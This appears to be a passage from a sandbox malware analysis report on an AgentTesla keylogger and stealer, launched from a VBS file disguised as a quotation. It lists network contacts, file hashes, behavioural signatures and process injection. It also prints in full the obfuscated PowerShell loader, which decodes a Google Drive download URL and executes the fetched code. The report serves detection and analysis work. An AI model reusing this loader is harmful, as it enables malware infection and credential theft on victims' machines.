GB 172.217.169.33:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 api.ipify.org udp
US 104.26.13.205:443 api.ipify.org tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 a9e4c335c9d878edd6db11161213b490
SHA1 807fca2338d7e5d2a4690bd31ea8cc94452aae50
SHA256 d33c775e398bed49421fba4f3c4eaab1116dc1657045c82a48a2c787f7789a04
SHA512 b46fefd1d21e9ddb1a4e3e314f9d2e8c8634bfaf5b41ea876fc37cdb71f71f3a84a0c4cd4c7a2e71393ab2ea41621c563890e5e06e12f432dd80777e6158b86a

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 93bb5ef9b24762f5b777902db9652a90
SHA1 4d5b4963a4cc2a0c739b421d172642328e89faec
SHA256 88c5c0ecab55fcfe0f7585ad40a094bc44c4db8828eb1427d5d4f8a528521dfa
SHA512 ebfe105c6f4c936af682d0f94a7821ac94afa83f1a489310393939d90fbdfdb65b6dc7f558fbce7c3bc08be9d1d8730d2d66ee1261ea00ff9c8db4d348c22837

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 28661f406d4619247e300df74949b3d9
SHA1 487b9828c921181bf6156bc457060f70d141c1da
SHA256 0d7f5495f44a7667922b979efbaf163d9b8787be057fb996b528d919306317e6
SHA512 97d5f511dea6c39c076adc6dabf947fd5d68ec3db81b4da173f0952c5800291431742b3ae868fa74d73a8f877e316efb091b76e86b168aa0b3541ae3bd27e4dd

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 2cf72d7b402be9b7c6390b774f611259
SHA1 fd8943d464d6ae7d0508e5869c1244fa43a4f3a9
SHA256 345b91c5f950e5c1eec5ea1735e5722ec9c32de3fecde00e76c6e4830a58be43
SHA512 42a054f09b2f59618ffb6beb6a808b3a51cf8796b56d28a75813c02c6253a5c8ff0bcfeb730e2bdf4793f7462622787b27782077ebf7557d07aee89490c34049

C:\Users\Admin\AppData\Local\Temp\Multinucleolar.txt

MD5 3e69c6aa3db22c1db4b514b81496474f
SHA1 5e4c7a99602e76ab33aed93ebebdda32d8431628
SHA256 e748db8fb82a12106de8baaf2d525a5ccd56de4c6354b02aad0abde5ef5dcb67
SHA512 08d381918e3f209142dc7e1b05e9500d25833a84fb555fb5034237c0279d60c921a9fe88a8865061e6f8c1e33e5c0ef787ee6631b53b22fb17c6d99f8f109915

memory/1172-326-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

memory/1172-327-0x000000001B6D0000-0x000000001B9B2000-memory.dmp

memory/1172-328-0x0000000002050000-0x0000000002058000-memory.dmp

memory/1172-329-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1172-330-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1172-332-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1172-331-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1172-333-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MAN20DV3AE7N9FNLNFE9.temp

MD5 39412b0c7dd5f1e13aa8338ab53b677b
SHA1 3480d86e8a07ac41f0c449d9b520d949e57b38eb
SHA256 c9b8606ee62a0bb0ac78fc144ea08b6b9f1179c0f9ed30b475bc9be9fe60c987
SHA512 49af75c81c43d743bd34f111b88d53d282e659c28267226a35b8a7ef8a86c15e94bf1affebf0763a653838ad9826db8e678cabb242d9a1ef2bb57bc23236c6ec

C:\Users\Admin\AppData\Roaming\Scrouge.Swi

MD5 be60fe46432e08e827aeefd9f72d5790
SHA1 7322ebc77810e84976136174258dddde78a23f27
SHA256 8722cb6fe1e75ddcd9127b92f438e2b0155eab29cc29270ca7aa35be9edff7b4
SHA512 72a7e93c1c1d78260ec1ac1438450baf4d6f21a1299824878e405a115c8318796d7bf233db80d42f8d66ab1c73531741965fbf1e9679a1fb2071bab9d8b9e913

memory/2308-353-0x0000000006620000-0x000000000C279000-memory.dmp

memory/1172-354-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/1172-355-0x000007FEF571E000-0x000007FEF571F000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabBF0B.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c5411556099cd659b07a93f6df871069
SHA1 f93759b25079e7befc9dfdd5812695536794d468
SHA256 94a239a3cedd0b33b263a5e18527bfe7179e09fcf3221d513dc898265248cf9a
SHA512 ee6e79ffec042dd961234d0b447b060e763df5af9cb7f31064c665b51c5d59f59dfcd02cd06417801f6c8e968663371c92fb7dfd22e0dc71a7e7e1f3c3b10555

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 666c6eca442cb8196b4c9db0b1c9e0df
SHA1 db50b88aa11ce49dd156630ef2d46f00ad56e4c8
SHA256 6784803fe36840cc325e7b0d3ad5a7ca9acdd6e837daa29820455c327b8ca991
SHA512 2d98fcd5c5675ecd4077d8636aab9adea62cdcc74133bd17d0af8790c8f32cf3625eccdd1e7bc9c33c126df6c9582d976c2cabc277d0e3d54905fccdc98e9804

memory/2752-383-0x0000000000600000-0x0000000001662000-memory.dmp

memory/1172-384-0x000007FEF5460000-0x000007FEF5DFD000-memory.dmp

memory/2752-385-0x0000000000600000-0x0000000000642000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-18 09:36

Reported

2024-06-18 09:38

Platform

win10v2004-20240611-en

Max time kernel

139s

Max time network

146s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"

Signatures

AgentTesla

keylogger trojan stealer spyware agenttesla

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3612 set thread context of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3736 wrote to memory of 1196 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3736 wrote to memory of 1196 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1196 wrote to memory of 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 632 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1196 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1196 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 1196 wrote to memory of 3612 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 3612 wrote to memory of 4652 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 4652 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 4652 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 3612 wrote to memory of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3612 wrote to memory of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3612 wrote to memory of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3612 wrote to memory of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 3612 wrote to memory of 1156 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt 